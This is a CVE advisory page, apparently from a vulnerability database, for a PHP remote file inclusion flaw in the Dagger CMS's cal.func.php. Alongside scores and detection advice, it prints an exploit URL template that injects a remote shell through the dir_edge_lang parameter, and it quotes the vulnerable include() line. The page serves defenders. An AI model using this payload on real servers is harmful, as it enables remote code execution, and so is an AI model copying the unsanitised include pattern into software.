cbcvebase.
CVE-2007-3431
published 2007-06-27

CVE-2007-3431: PHP remote file inclusion vulnerability in cal.func.php in Valerio Capello Dagger - The Cutting Edge r23jan2007 allows remote attackers to execute arbitrary…

PriorityP355medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
70.72%
99.3th percentile
PHP remote file inclusion vulnerability in cal.func.php in Valerio Capello Dagger - The Cutting Edge r23jan2007 allows remote attackers to execute arbitrary PHP code via a URL in the dir_edge_lang parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
valerio_capellodagger_the_cutting_edge

Detection & IOCsextracted from sources · hover to see the quote

pathcal.func.php
urlhttp://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.zip
commandhttp://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]
  • Monitor HTTP requests targeting cal.func.php with a URL-like value in the dir_edge_lang query parameter, which is the RFI injection point.
  • The vulnerable code path is the include() call in cal.func.php that directly concatenates the unsanitised dir_edge_lang parameter: include($dir_edge_lang.'cal_lang.inc.php'); — any external URL supplied here will be fetched and executed.
  • ·Exploitation requires allow_url_include (and allow_url_fopen) to be enabled in the PHP configuration; without it the remote file inclusion cannot fetch an external shell.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.